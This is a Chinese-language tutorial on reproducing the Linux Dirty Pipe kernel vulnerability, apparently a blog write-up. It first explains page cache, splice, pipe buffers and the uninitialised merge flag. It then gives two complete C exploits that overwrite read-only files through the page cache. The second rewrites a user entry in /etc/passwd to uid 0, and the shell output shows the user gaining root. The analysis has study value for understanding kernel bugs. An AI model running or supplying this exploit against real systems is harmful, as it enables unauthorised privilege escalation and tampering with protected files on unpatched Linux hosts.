Kernel 现实漏洞复现：Dirty Pipe

Dirty Pipe 漏洞成因

攻击者可以利用该漏洞实现低权限用户提升至 root 权限，且能对主机任意可读文件进行读写

攻击适用版本：

Linux Kernel版本 >= 5.8
Linux Kernel版本 < 5.16.11 / 5.15.25 / 5.10.102

攻击适用条件：

攻击者必须对目标文件有读权限（因为需要通过 splice 方法将文件的页送入管道中）
偏移量不能在页边界上（因为页上至少有一个字节已经拼接到管道中）
写入不能跨越页边界（因为这将为其余部分创建一个新的匿名缓冲区）
文件无法调整大小（因为管道有自己的页面填充管理，并且不会告诉页面缓存附加了多少数据）
单次写入的长度不能超过一页（因为页大小为4K）

该漏洞源于新管道缓冲区结构的“flag”变量在 Linux 内核中的 copy_page_to_iter_pipe 和 push_pipe 函数中缺乏正确的初始化

前置知识 - Page Cache & splice

Page Cache 即缓存管理机制，一般当我们访问一个磁盘文件的时候，首先内核会将其内容装载到 Page Cache 内存中，后续都是直接读取内存中的 Page Cache 来访问数据，内核会在合适的时机将标脏的 Page 给写回磁盘中

如果用户进程使用 read/write 读写文件，那么内核会先将载入数据的物理内存映射到内核虚拟内存 buffer，然后再将内核的 buffer 数据拷贝到用户态
如果追求效率，内核也提供了一种零拷贝模式：用户进程可以使用 mmap 直接将用户态的 buffer 映射到物理内存，之后直接访问自己的 mmap 区域即可访问到那段物理内存内容，读写数据时不需要再发起系统调用，也就避免了跨越用户态和内核态边界的上下文切换

splice 系统调用通过一种“零拷贝”的方法将文件内容输送到管道之中，相比传统的直接将文件内容送入管道性能更好

经典的 read/write 方式：利用用户态数据 buf 作为文件缓存

buf = malloc(len)  		// 首先申请一块长度为len的内存
read(fd1, buf, len)  	// 将第一个文件fd1中len长度的数据读入buf
write(fd2, buf, len) 	// 将buf中的数据写入文件fd2中

零拷贝 splice：在数据发送的过程中，不需要在用户态为数据申请 buf，也就是不会产生用户态、内核态之间的数据拷贝

ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out, size_t len, unsigned int flags);

在两个文件描述符之间移动数据，而无需在内核地址空间和用户地址空间之间进行复制
它从文件描述符 fd_in 向文件描述符 fd_out 传输最多 len 字节的数据
其中两个文件描述符之一必须引用管道

splice 在内核中对应的接口如下：

/*
 * Entry point of the splice system call.
 *
 * Validates len and flags, resolves both file descriptors and hands the
 * actual data movement to do_splice().
 *
 * Returns 0 when len is 0, -EINVAL when flags contains bits outside
 * SPLICE_F_ALL, -EBADF when either descriptor cannot be resolved, and
 * otherwise whatever do_splice() returns.
 */
SYSCALL_DEFINE6(splice, int, fd_in, loff_t __user *, off_in,
		int, fd_out, loff_t __user *, off_out,
		size_t, len, unsigned int, flags)
{
	struct fd in, out;
	long error;

	/* Nothing to transfer. */
	if (unlikely(!len))
		return 0;

	/* Reject any flag bit that is not part of SPLICE_F_ALL. */
	if (unlikely(flags & ~SPLICE_F_ALL))
		return -EINVAL;

	/* Stays -EBADF unless both descriptors resolve and do_splice() runs. */
	error = -EBADF;
	in = fdget(fd_in); /* look up the input file */
	if (in.file) {
		out = fdget(fd_out); /* look up the output file */
		if (out.file) {
			error = do_splice(in.file, off_in, out.file, off_out,
					  len, flags); /* the real data movement happens here */
			fdput(out);
		}
		fdput(in);
	}
	return error;
}

调用链如下：

sys_splice -> do_splice -> []
[pipe to pipe]-> splice_pipe_to_pipe -> ()
[pipe to file]-> do_splice_from -> ()
[file to pipe]-> do_splice_to -> f_op->splice_read(generic_file_splice_read) -> call_read_iter -> f_op->read_iter(copy_folio_to_iter) -> ... -> copy_page_to_iter -> copy_page_to_iter_pipe

其中 copy_page_to_iter_pipe 对“flag”变量没有进行初始化

使用 splice 将数据从文件导入到管道中：（file to pipe）

首先将数据加载到文件页面缓存 page cache 中
然后创建一个管道缓冲区 pipe_buffer
直接 pipe_buffer->page = page cache，把 page cache 当做 pipe_buffer 的缓存页

如果此时该管道还想存储从其他输入流传输来的数据，就只能重新申请 pipe_buffer，不能直接附加到刚才的 pipe_buffer 中，因为该 page 是文件的缓存页面，不属于管道，但 Dirty Pipe 利用了一种方法使该页面可以被管道写入

前置知识 - Pipe

管道 Pipe 是一种经典的 IPC 通信方式：

它包含一个输入端和一个输出端，程序将数据从一端输入，从另一端读出
在内核中，为了实现这种数据通信，需要以页面 Page 为单位维护一个环形缓冲区（被称为 ring_buffer），里面存了16个 pipe_buffer 结构，每个 pipe_buffer 结构又有一个指针指向一个表示物理内存页 Page 的结构体

/*
 * One slot of a pipe's ring of buffers. Each slot refers to a single
 * page and records which part of that page currently holds pipe data.
 */
struct pipe_buffer {
	struct page *page; /* describes the physical page backing this buffer */
	unsigned int offset, len; /* data occupies [offset, offset + len) of the page; pipe_write appends at offset + len */
	const struct pipe_buf_operations *ops; /* function pointers used to operate on this buffer */
	unsigned int flags; /* per-buffer flag bits; pipe_write tests PIPE_BUF_FLAG_CAN_MERGE here */
	unsigned long private;
};

每个 Page 大小为 4KB，页面之间并不连续
管道维护两个位置索引，一个用来写 (pipe->head)，一个用来读 (pipe->tail)，缓冲区可以被循环利用
当前页面带有 PIPE_BUF_FLAG_CAN_MERGE 标志，并且续写后的数据长度不超过一页时，可以直接在该页面上续写

管道描述符 pipe_inode_info，用于表示一个管道，存储管道相应的信息：

/*
 * Descriptor of a single pipe: ring indices, reader/writer bookkeeping
 * and the array of pipe_buffer slots that hold the data.
 */
struct pipe_inode_info {
	struct mutex mutex;
	wait_queue_head_t rd_wait, wr_wait;
	unsigned int head; /* production point of the ring (where writes go) */
	unsigned int tail; /* consumption point of the ring (where reads come from) */
	unsigned int max_usage;
	unsigned int ring_size;
#ifdef CONFIG_WATCH_QUEUE
	bool note_loss;
#endif
	unsigned int nr_accounted;
	unsigned int readers; /* current number of readers (incremented on each open for reading, decremented on close) */
	unsigned int writers; /* current number of writers (incremented on each open for writing, decremented on close) */
	unsigned int files; /* number of struct file objects referring to this pipe */
	unsigned int r_counter; /* reader counter: incremented on each open for reading, unchanged on close */
	unsigned int w_counter; /* writer counter: incremented on each open for writing, unchanged on close */
	struct page *tmp_page; /* cached spare page that speeds up page-frame allocation: a released frame is stored here and allocation tries it first, falling back to the buddy system only when it is empty */
	struct fasync_struct *fasync_readers; /* async notification descriptor for the read side */
	struct fasync_struct *fasync_writers; /* async notification descriptor for the write side */
	struct pipe_buffer *bufs; /* the circular buffer (made of 16 pipe_buffer objects, each owning one memory page) */
	struct user_struct *user; /* the user who created this pipe */
#ifdef CONFIG_WATCH_QUEUE
	struct watch_queue *watch_queue;
#endif
};

管道可以分为命名管道和匿名管道：

命名管道是一个有名字的实体文件
匿名管道就是我们常使用的管道符创建的管道

本质上来讲，管道就是一种进程间的通信手段，让两个进程可以通过 pipe 发送和接收数据（匿名管道可用于父子与兄弟进程之间的通信，有名管道则用于两个无关进程的通信）

这里我们重点分析实现管道写的函数 pipe_write：

装载了文件缓存页面 page cache 的 pipe_buffer 不能被该管道续写（否则写入该管道的数据将会被写入文件的缓存页）
我们来看一下究竟是哪里限制了管道的写入：

/*
 * Write handler for pipes (excerpt; the middle of the function is elided).
 *
 * The part shown here is the "merge" fast path: when the pipe already
 * holds data and the write has a sub-page remainder, that remainder is
 * appended to the page of the most recently filled pipe_buffer, provided
 * the buffer carries PIPE_BUF_FLAG_CAN_MERGE and the data still fits in
 * the page.
 *
 * Returns 0 for an empty write, -EPIPE (after raising SIGPIPE) when the
 * pipe has no readers, -EXDEV for watch-queue pipes, -EFAULT on a short
 * copy from the caller, or the value accumulated in ret.
 */
static ssize_t
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
	struct file *filp = iocb->ki_filp;
	struct pipe_inode_info *pipe = filp->private_data;
	unsigned int head;
	ssize_t ret = 0;
	size_t total_len = iov_iter_count(from);
	ssize_t chars;
	bool was_empty = false;
	bool wake_next_writer = false;

	/* Zero-length writes succeed immediately. */
	if (unlikely(total_len == 0))
		return 0;

	__pipe_lock(pipe);

	/* Writing to a pipe without readers raises SIGPIPE and fails. */
	if (!pipe->readers) {
		send_sig(SIGPIPE, current, 0);
		ret = -EPIPE;
		goto out;
	}

#ifdef CONFIG_WATCH_QUEUE
	/* Pipes with a watch queue attached are rejected here. */
	if (pipe->watch_queue) {
		ret = -EXDEV;
		goto out;
	}
#endif

	head = pipe->head; /* production point of the ring (used for writing) */
	was_empty = pipe_empty(head, pipe->tail); /* is the pipe currently empty? */ 
	/* Remainder of the write length modulo the page size. */
	chars = total_len & (PAGE_SIZE-1);
	if (chars && !was_empty) { /* there is a sub-page remainder and the pipe already holds data */
		unsigned int mask = pipe->ring_size - 1;
		struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask]; /* the slot just before head, i.e. the last one filled */
		int offset = buf->offset + buf->len; /* first byte after the data already in that page */ 

		/* Appending to the current page is allowed only when the buffer has PIPE_BUF_FLAG_CAN_MERGE and the data fits. */
		if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
		    offset + chars <= PAGE_SIZE) {
  
			/*
			 * NOTE(review): the cross-page condition is the
			 * "offset + chars <= PAGE_SIZE" test above, not this call.
			 * pipe_buf_confirm() is not shown here; upstream documents
			 * the confirm hook as validating the buffer's contents.
			 */
			ret = pipe_buf_confirm(pipe, buf);
			if (ret)
				goto out; /* confirmation failed: leave with that error */

			ret = copy_page_from_iter(buf->page, offset, chars, from); /* copy the caller's data from `from` into buf->page at offset */
			if (unlikely(ret < chars)) {
				/* Short copy from the caller's iterator. */
				ret = -EFAULT;
				goto out;
			}

			buf->len += ret; /* the buffer now covers the appended bytes too */
			if (!iov_iter_count(from))
				goto out; /* everything was merged; nothing left to write */
		}
	}
    
    /* (the remainder of the write path is elided in this excerpt) */
    ......
    
out:
	/* Do not wake another writer if the pipe is full. */
	if (pipe_full(pipe->head, pipe->tail, pipe->max_usage))
		wake_next_writer = false;
	__pipe_unlock(pipe);

	/* The pipe was empty before this write: wake readers and send SIGIO. */
	if (was_empty) {
		wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
		kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);
	}
	if (wake_next_writer)
		wake_up_interruptible_sync_poll(&pipe->wr_wait, EPOLLOUT | EPOLLWRNORM);
	/* After a successful write, update the file times; a failure there replaces ret. */
	if (ret > 0 && sb_start_write_trylock(file_inode(filp)->i_sb)) {
		int err = file_update_time(filp);
		if (err)
			ret = err;
		sb_end_write(file_inode(filp)->i_sb);
	}
	return ret;
}

重点注意该函数对 PIPE_BUF_FLAG_CAN_MERGE 的处理，如果 flag 中有该标志位，就会调用 copy_page_from_iter 函数将数据复制到管道缓冲区

Dirty Pipe 漏洞利用

对于能否将数据附加至一个管道缓冲区，内核采用了如下的机制：

Linux 2.6.16 以前，pipe_buf_operations 结构有一个单独的 flag 叫做 can_merge，下面这行 if 语句通过则允许在当前页面续写

if (ops->can_merge && offset + chars <= PAGE_SIZE) {

Linux 2.6.16 起，为了支持 splice 调用，引入了 page_cache_pipe_buf_ops，它实际上是一个设置了 can_merge=0 的 pipe_buf_operations，用来指示这部分页不能被管道写入

/*
 * Buffer operations for pipe buffers that refer to page-cache pages
 * (the form introduced in Linux 2.6.16 to support splice).
 * .can_merge = 0 marks such buffers as not appendable by pipe writes.
 */
static const struct pipe_buf_operations page_cache_pipe_buf_ops = {
	.can_merge = 0,
	.map = generic_pipe_buf_map,
	.unmap = generic_pipe_buf_unmap,
	.confirm = page_cache_pipe_buf_confirm,
	.release = page_cache_pipe_buf_release,
	.steal = page_cache_pipe_buf_steal,
	.get = generic_pipe_buf_get,
};

Linux 5.0 中，由于只有一种管道缓冲区类型可以追加新数据，对 can_merge 的检查被修改为只检查类型是否是 anon_pipe_buf_ops（这就是那个唯一可追加内容的类型）

if (pipe_buf_can_merge(buf) && offset + chars <= PAGE_SIZE) {

/*
 * Linux 5.0 form of the merge check: a buffer may take appended data
 * only when its operations table is anon_pipe_buf_ops.
 */
static bool pipe_buf_can_merge(struct pipe_buffer *buf) {
    return buf->ops == &anon_pipe_buf_ops;
}

Linux 5.8 中又将 pipe_buf_operations 类型的比较修改为 pipe_buffer的一个 flag：PIPE_BUF_FLAG_CAN_MERGE

if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) && offset + chars <= PAGE_SIZE) {

Linux 4.9 添加了两个新函数 copy_page_to_iter_pipe 和 push_pipe ，它们分配了新的管道缓冲区，但并没有初始化 flag（当时 flag 的作用并不大）

Linux 5.8 对 flag 有所运用，没有初始化 flag，意味着之前遗留下来的 PIPE_BUF_FLAG_CAN_MERGE 标志位不会被 splice 系统调用清空，这可能会影响后续某些函数的执行流程

漏洞利用的思路为：

创建管道
用任意数据填充管道（为整个缓冲区环结构设置 PIPE_BUF_FLAG_CAN_MERGE 标记）
清空管道（保留 pipe_inode_info 环中每一个缓冲区的 flag ）
使用 splice 将目标文件（以只读方式打开）中的数据从目标偏移之前的位置放入到管道中
将任意数据写入管道，此数据将覆盖缓存的文件页面，而不是创建新的匿名缓冲区

伪代码如下：

pipe(p);

/* Fill the pipe completely; every pipe_buffer now carries the PIPE_BUF_FLAG_CAN_MERGE flag. */
for (r = pipe_size; r > 0;) {
    n = r > sizeof(buffer) ? sizeof(buffer) : r;
    write(p[1], buffer, n);
    r -= n;
}

/* Drain the pipe; all pipe_buffer instances are released, but their flags stay set. */
for (r = pipe_size; r > 0;) {
    n = r > sizeof(buffer) ? sizeof(buffer) : r;
    read(p[0], buffer, n);
    r -= n;
}

fd = open("target", O_RDONLY);
--offset;
splice(fd, &offset, p[1], NULL, 1, 0); /* Splice the single byte just before the target offset into the pipe; this adds a reference to the page cache while the stale PIPE_BUF_FLAG_CAN_MERGE remains in effect. */

write(p[1], data, data_size); /* No new pipe_buffer is created; the data is written into the page cache instead. */

调用 splice 函数可以通过“零拷贝”的形式将文件发送到 pipe（代码层面的零拷贝是直接将文件缓存页 page cache 作为 pipe 的缓存页使用）
但这里引入了一个变量未初始化漏洞，导致文件缓存页会在后续 pipe 通道中被当成普通 pipe 缓存页而被“续写”进而被篡改
然而，在这种情况下，因为没有其他可写权限的程序进行 write 操作，所以内核并不会将这个缓存页判定为“脏页”，短时间内(到下次重启之类的)不会刷新到磁盘
在这段时间内所有访问该文件的场景都将使用被篡改的文件缓存页，也就达成了一个“短时间内对任意可读文件任意写”的操作

Dirty Pipe 漏洞复现

1.修改服务器上 flag 文件的值：

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>
 
#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif
 
/*
 * Create a pipe, fill it to capacity and drain it again.
 *
 * Filling makes every pipe_buffer slot of the ring carry
 * PIPE_BUF_FLAG_CAN_MERGE; draining empties the pipe again, and on the
 * affected kernels described in this article the flag stays behind in
 * each slot.
 *
 * p receives the read end in p[0] and the write end in p[1]. Any failure
 * aborts the process, because the caller relies on the pipe being empty
 * and fully cycled when this function returns.
 */
static void prepare_pipe(int p[2])
{
        if (pipe(p)) abort();

        /*
         * fcntl() returns -1 on failure. Storing that directly in an
         * unsigned would yield a huge size and the fill loop below would
         * block forever once the pipe is full.
         */
        const int capacity = fcntl(p[1], F_GETPIPE_SZ);
        if (capacity <= 0) abort();
        const unsigned pipe_size = (unsigned)capacity;
        static char buffer[4096];

        /* Fill the pipe, counting only the bytes that were really written. */
        for (unsigned r = pipe_size; r > 0;) {
                unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
                const ssize_t done = write(p[1], buffer, n);
                if (done <= 0) abort();
                r -= (unsigned)done;
        }

        /* Drain the pipe, counting only the bytes that were really read. */
        for (unsigned r = pipe_size; r > 0;) {
                unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
                const ssize_t done = read(p[0], buffer, n);
                if (done <= 0) abort();
                r -= (unsigned)done;
        }
}
 
/*
 * Demo 1: overwrite part of the file "flag", opened read-only, through
 * the page cache.
 *
 * The target path, offset and replacement bytes are fixed. The checks
 * before the write mirror the constraints listed in this article: the
 * offset must not sit on a page boundary, the write must not cross a page
 * boundary, and the file cannot be enlarged.
 *
 * Returns EXIT_SUCCESS when the whole payload was written to the pipe,
 * EXIT_FAILURE otherwise. Descriptors opened here are closed before
 * returning.
 */
int main(int argc, char **argv) {
        (void)argc;
        (void)argv;

        const char *const path = "flag";

        loff_t offset = 1;
        const char *const data = "lag{pipeeee}";
        const size_t data_size = strlen(data);
        int status = EXIT_FAILURE;
        int p[2] = { -1, -1 };
        ssize_t nbytes;

        if (offset % PAGE_SIZE == 0) {
                fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
                return EXIT_FAILURE;
        }

        const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
        const loff_t end_offset = offset + (loff_t)data_size;

        if (end_offset > next_page) {
                fprintf(stderr, "Sorry, cannot write across a page boundary\n");
                return EXIT_FAILURE;
        }

        const int fd = open(path, O_RDONLY);
        if (fd < 0) {
                perror("open failed");
                return EXIT_FAILURE;
        }

        struct stat st;
        if (fstat(fd, &st)) {
                perror("stat failed");
                goto out;
        }
        /* off_t is not guaranteed to be long; widen explicitly for printf. */
        printf("st.st_size:0x%llx\n", (unsigned long long)st.st_size);

        if (offset > st.st_size) {
                fprintf(stderr, "Offset is not inside the file\n");
                goto out;
        }

        if (end_offset > st.st_size) {
                fprintf(stderr, "Sorry, cannot enlarge the file\n");
                goto out;
        }

        /* Fill and drain a fresh pipe (see prepare_pipe). */
        prepare_pipe(p);

        /*
         * Splice the one byte just before the target offset into the pipe,
         * so that the pipe buffer refers to the file's page-cache page.
         */
        --offset;
        nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
        if (nbytes < 0) {
                perror("splice failed");
                goto out;
        }
        if (nbytes == 0) {
                fprintf(stderr, "short splice\n");
                goto out;
        }

        /* This write is appended to the spliced page instead of a new buffer. */
        nbytes = write(p[1], data, data_size);
        if (nbytes < 0) {
                perror("write failed");
                goto out;
        }
        if ((size_t)nbytes < data_size) {
                fprintf(stderr, "short write\n");
                goto out;
        }

        status = EXIT_SUCCESS;

out:
        if (p[0] >= 0) close(p[0]);
        if (p[1] >= 0) close(p[1]);
        close(fd);
        return status;
}

结果如下：

/ $ cat flag
flag{yhellow}
/ $ ./exp
st.st_size:0xe
/ $ cat flag
flag{pipeeee}

2.修改 /etc/passwd 中用户的 uid 和组 id 来实现提权：

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>
 
#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif
 
/*
 * Create a pipe, fill it to capacity and drain it again.
 *
 * Filling makes every pipe_buffer slot of the ring carry
 * PIPE_BUF_FLAG_CAN_MERGE; draining empties the pipe again, and on the
 * affected kernels described in this article the flag stays behind in
 * each slot.
 *
 * p receives the read end in p[0] and the write end in p[1]. Any failure
 * aborts the process, because the caller relies on the pipe being empty
 * and fully cycled when this function returns.
 */
static void prepare_pipe(int p[2])
{
        if (pipe(p)) abort();

        /*
         * fcntl() returns -1 on failure. Storing that directly in an
         * unsigned would yield a huge size and the fill loop below would
         * block forever once the pipe is full.
         */
        const int capacity = fcntl(p[1], F_GETPIPE_SZ);
        if (capacity <= 0) abort();
        const unsigned pipe_size = (unsigned)capacity;
        static char buffer[4096];

        /* Fill the pipe, counting only the bytes that were really written. */
        for (unsigned r = pipe_size; r > 0;) {
                unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
                const ssize_t done = write(p[1], buffer, n);
                if (done <= 0) abort();
                r -= (unsigned)done;
        }

        /* Drain the pipe, counting only the bytes that were really read. */
        for (unsigned r = pipe_size; r > 0;) {
                unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
                const ssize_t done = read(p[0], buffer, n);
                if (done <= 0) abort();
                r -= (unsigned)done;
        }
}
 
/*
 * Demo 2: overwrite one line of "/etc/passwd", opened read-only, through
 * the page cache.
 *
 * The target path, offset and replacement bytes are fixed; the
 * replacement has the same length as the line it overwrites in the
 * article's test system, so the file size does not change. The checks
 * before the write mirror the constraints listed in this article: the
 * offset must not sit on a page boundary, the write must not cross a page
 * boundary, and the file cannot be enlarged.
 *
 * Returns EXIT_SUCCESS when the whole payload was written to the pipe,
 * EXIT_FAILURE otherwise. Descriptors opened here are closed before
 * returning.
 */
int main(int argc, char **argv) {
        (void)argc;
        (void)argv;

        const char *const path = "/etc/passwd";

        loff_t offset = 30;
        const char *const data = "test:x:0:0:,,,,,,,,,,,,,,,:/root:/bin/sh";
        const size_t data_size = strlen(data);
        int status = EXIT_FAILURE;
        int p[2] = { -1, -1 };
        ssize_t nbytes;

        if (offset % PAGE_SIZE == 0) {
                fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
                return EXIT_FAILURE;
        }

        const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
        const loff_t end_offset = offset + (loff_t)data_size;

        if (end_offset > next_page) {
                fprintf(stderr, "Sorry, cannot write across a page boundary\n");
                return EXIT_FAILURE;
        }

        const int fd = open(path, O_RDONLY);
        if (fd < 0) {
                perror("open failed");
                return EXIT_FAILURE;
        }

        struct stat st;
        if (fstat(fd, &st)) {
                perror("stat failed");
                goto out;
        }
        /* off_t is not guaranteed to be long; widen explicitly for printf. */
        printf("st.st_size:0x%llx\n", (unsigned long long)st.st_size);

        if (offset > st.st_size) {
                fprintf(stderr, "Offset is not inside the file\n");
                goto out;
        }

        if (end_offset > st.st_size) {
                fprintf(stderr, "Sorry, cannot enlarge the file\n");
                goto out;
        }

        /* Fill and drain a fresh pipe (see prepare_pipe). */
        prepare_pipe(p);

        /*
         * Splice the one byte just before the target offset into the pipe,
         * so that the pipe buffer refers to the file's page-cache page.
         */
        --offset;
        nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
        if (nbytes < 0) {
                perror("splice failed");
                goto out;
        }
        if (nbytes == 0) {
                fprintf(stderr, "short splice\n");
                goto out;
        }

        /* This write is appended to the spliced page instead of a new buffer. */
        nbytes = write(p[1], data, data_size);
        if (nbytes < 0) {
                perror("write failed");
                goto out;
        }
        if ((size_t)nbytes < data_size) {
                fprintf(stderr, "short write\n");
                goto out;
        }

        status = EXIT_SUCCESS;

out:
        if (p[0] >= 0) close(p[0]);
        if (p[1] >= 0) close(p[1]);
        close(fd);
        return status;
}

因为 su 命令需要 root 权限，所以在 root 用户中进行测试
结果如下：

/ # cat /etc/passwd 
root:x:0:0:root:/root:/bin/sh
test:x:1000:1000:note:/home/test:/bin/sh
/ # ./exp
st.st_size:0x47
/ # cat /etc/passwd 
root:x:0:0:root:/root:/bin/sh
test:x:0:0:,,,,,,,,,,,,,,,:/root:/bin/sh
/ # su test
/ # whoami
root
/ # id
uid=0(root) gid=0 groups=0

切换到 test 用户以后，还是显示 root 权限

参考：